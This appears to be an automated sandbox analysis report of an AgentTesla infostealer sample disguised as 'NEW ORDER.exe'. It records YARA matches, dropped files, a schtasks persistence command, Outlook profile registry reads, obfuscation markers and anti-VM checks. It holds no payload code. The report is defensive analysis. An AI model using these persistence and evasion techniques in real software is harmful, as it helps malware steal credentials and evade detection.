                  Source: Process Memory Space: NEW ORDER.exe PID: 4932, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                  Source: Process Memory Space: NEW ORDER.exe PID: 5108, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 488 -p 1468 -ip 1468
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_014CE810
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_014CE820
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_014CBF54
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_078B9738
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_078B3F50
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_078B55F0
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_078B2D00
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_078BD4B0
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_078B4BC0
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_078B3340
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_078B875A
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_078B8760
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_078B3E98
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_078BDE20
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_078B55E3
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_078B8508
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_078B84F9
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_078BDB80
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_078B8B90
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_078B8BA0
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_078B4BB0
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_078B3330
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_078B8998
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_078BD960
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_078BF008
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_08252035
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_08250006
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_08250040
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_08252123
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_060F14C0
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_060FA4E0
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_060F4CF0
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_060FD53B
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_060FD540
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_0612F508
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_06125DD3
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_06125878
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_0612B940
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_06123330
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_0612CB9F
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_0612CBA8
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_06D7B460
                  Source: NEW ORDER.exe, 00000000.00000002.270184623.0000000002E71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBunifu.UI.dll4 vs NEW ORDER.exe
                  Source: NEW ORDER.exe, 00000000.00000002.270184623.0000000002E71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedZaLUMapCOtfsZhGCygeOpdbZ.exe4 vs NEW ORDER.exe
                  Source: NEW ORDER.exe, 00000000.00000002.277628722.0000000003E79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedZaLUMapCOtfsZhGCygeOpdbZ.exe4 vs NEW ORDER.exe
                  Source: NEW ORDER.exe, 00000000.00000002.277628722.0000000003E79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs NEW ORDER.exe
                  Source: NEW ORDER.exe, 00000000.00000002.277628722.0000000003E79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFrTGi.exe6 vs NEW ORDER.exe
                  Source: NEW ORDER.exe, 00000000.00000000.227057982.0000000000962000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFrTGi.exe6 vs NEW ORDER.exe
                  Source: NEW ORDER.exe, 00000000.00000003.256225494.00000000034C8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs NEW ORDER.exe
                  Source: NEW ORDER.exe, 00000000.00000002.292192745.00000000076A0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs NEW ORDER.exe
                  Source: NEW ORDER.exe, 00000007.00000002.496413637.00000000009A8000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs NEW ORDER.exe
                  Source: NEW ORDER.exe, 00000007.00000000.265923342.0000000000436000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedZaLUMapCOtfsZhGCygeOpdbZ.exe4 vs NEW ORDER.exe
                  Source: NEW ORDER.exeBinary or memory string: OriginalFilenameFrTGi.exe6 vs NEW ORDER.exe
                  Source: NEW ORDER.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: HvabCK.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: NEW ORDER.exeVirustotal: Detection: 49%
                  Source: C:\Users\user\Desktop\NEW ORDER.exeFile read: C:\Users\user\Desktop\NEW ORDER.exeJump to behavior
                  Source: NEW ORDER.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\NEW ORDER.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: unknownProcess created: C:\Users\user\Desktop\NEW ORDER.exe "C:\Users\user\Desktop\NEW ORDER.exe"
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HvabCK" /XML "C:\Users\user\AppData\Local\Temp\tmp2F70.tmp
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess created: C:\Users\user\Desktop\NEW ORDER.exe {path}
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 488 -p 1468 -ip 1468
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HvabCK" /XML "C:\Users\user\AppData\Local\Temp\tmp2F70.tmp
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess created: C:\Users\user\Desktop\NEW ORDER.exe {path}
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 488 -p 1468 -ip 1468
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\WerFault.exeProcess created: unknown unknown
                  Source: C:\Users\user\Desktop\NEW ORDER.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
                  Source: C:\Users\user\Desktop\NEW ORDER.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\Desktop\NEW ORDER.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\NEW ORDER.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\NEW ORDER.exeFile created: C:\Users\user\AppData\Roaming\HvabCK.exeJump to behavior
                  Source: C:\Users\user\Desktop\NEW ORDER.exeFile created: C:\Users\user\AppData\Local\Temp\tmp2F70.tmpJump to behavior
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@11/5@1/2
                  Source: C:\Users\user\Desktop\NEW ORDER.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: NEW ORDER.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                  Source: C:\Users\user\Desktop\NEW ORDER.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Users\user\Desktop\NEW ORDER.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Windows\System32\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:5624:120:WilError_01
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2300:120:WilError_01
                  Source: C:\Users\user\Desktop\NEW ORDER.exeMutant created: \Sessions\1\BaseNamedObjects\OBUHBKOjWEiTmUJKeKj
                  Source: NEW ORDER.exeString found in binary or memory: Address:/AddressToolStripTextBox-AddressToolStripButton'ToolStripSeparator3'PhoneToolStripLabel
                  Source: NEW ORDER.exeString found in binary or memory: Address:/AddressToolStripTextBox-AddressToolStripButton'ToolStripSeparator3'PhoneToolStripLabel
                  Source: 7.0.NEW ORDER.exe.400000.0.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                  Source: 7.0.NEW ORDER.exe.400000.0.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                  Source: C:\Users\user\Desktop\NEW ORDER.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\NEW ORDER.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\NEW ORDER.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: C:\Users\user\Desktop\NEW ORDER.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: NEW ORDER.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: NEW ORDER.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                  Data Obfuscation

                  barindex
                  .NET source code contains method to dynamically call methods (often used by packers)
                  Source: NEW ORDER.exe, ?QnN??lK?/??EFdowRHI?n?.cs.Net Code: NewLateBinding.LateCall(Bp?SUT???, null, "Invoke", stackVariable4, null, null, stackVariable13, true)
                  Source: HvabCK.exe.0.dr, ?QnN??lK?/??EFdowRHI?n?.cs.Net Code: NewLateBinding.LateCall(Bp?SUT???, null, "Invoke", stackVariable4, null, null, stackVariable13, true)
                  Source: 0.0.NEW ORDER.exe.960000.0.unpack, ?QnN??lK?/??EFdowRHI?n?.cs.Net Code: NewLateBinding.LateCall(Bp?SUT???, null, "Invoke", stackVariable4, null, null, stackVariable13, true)
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_078B3CC5 push esp; retf
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_060F2058 push ebp; retf
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_060F2648 push edi; retf
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_060F8E68 pushfd ; retf
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_060F268B push edi; retf
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_060F2698 push edi; retf
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_060F26DB push edi; retf
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_060F26E8 push edi; retf
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_060F2788 push edi; retf
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_060F27CB push edi; retf
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_060FE4B0 push esp; ret
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_060F24E8 push esi; retf
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_060F2599 push edi; retf
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_060FCA93 push eax; retf
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_060F22EB push ebp; retf
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_060F3B29 pushad ; retf
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_060F3B88 pushad ; retf
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_060F23E3 push ebp; retf
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_060F23E0 push ebp; retf
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_060F281B push edi; retf
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_060F2828 push edi; retf
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_060F28C8 push edi; retf
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_060F2918 push edi; retf
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_0612165E push es; ret
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_06121662 push es; ret
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_0612166A push es; ret
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_0612169A push es; ret
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_0612169E push es; ret
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_061216B2 push es; ret
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_061216B6 push es; ret
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_061216BA push es; ret
                  Source: initial sampleStatic PE information: section name: .text entropy: 7.7728861482664335
                  Source: initial sampleStatic PE information: section name: .text entropy: 7.7728861482664335
                  Source: C:\Users\user\Desktop\NEW ORDER.exeFile created: C:\Users\user\AppData\Roaming\HvabCK.exeJump to dropped file

                  Boot Survival

                  barindex
                  Uses schtasks.exe or at.exe to add and modify task schedules
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HvabCK" /XML "C:\Users\user\AppData\Local\Temp\tmp2F70.tmp
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Yara detected AntiVM3
                  Source: Yara matchFile source: Process Memory Space: NEW ORDER.exe PID: 4932, type: MEMORYSTR
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                  Source: NEW ORDER.exe, 00000000.00000002.270184623.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000002.272904701.00000000030CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                  Source: NEW ORDER.exe, 00000000.00000002.270184623.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000002.272904701.00000000030CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                  Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                  Source: C:\Users\user\Desktop\NEW ORDER.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
                  Source: C:\Users\user\Desktop\NEW ORDER.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Users\user\Desktop\NEW ORDER.exe TID: 1396Thread sleep time: -1844674407370954s >= -30000s
                  Source: C:\Users\user\Desktop\NEW ORDER.exe TID: 1556Thread sleep count: 9759 > 30
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\NEW ORDER.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\NEW ORDER.exeWindow / User API: threadDelayed 9759
                  Source: C:\Users\user\Desktop\NEW ORDER.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\Desktop\NEW ORDER.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\NEW ORDER.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information queried: ProcessInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeThread delayed: delay time: 922337203685477
                  Source: NEW ORDER.exe, 00000000.00000002.272904701.00000000030CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
                  Source: NEW ORDER.exe, 00000000.00000002.272904701.00000000030CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                  Source: NEW ORDER.exe, 00000000.00000002.272904701.00000000030CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
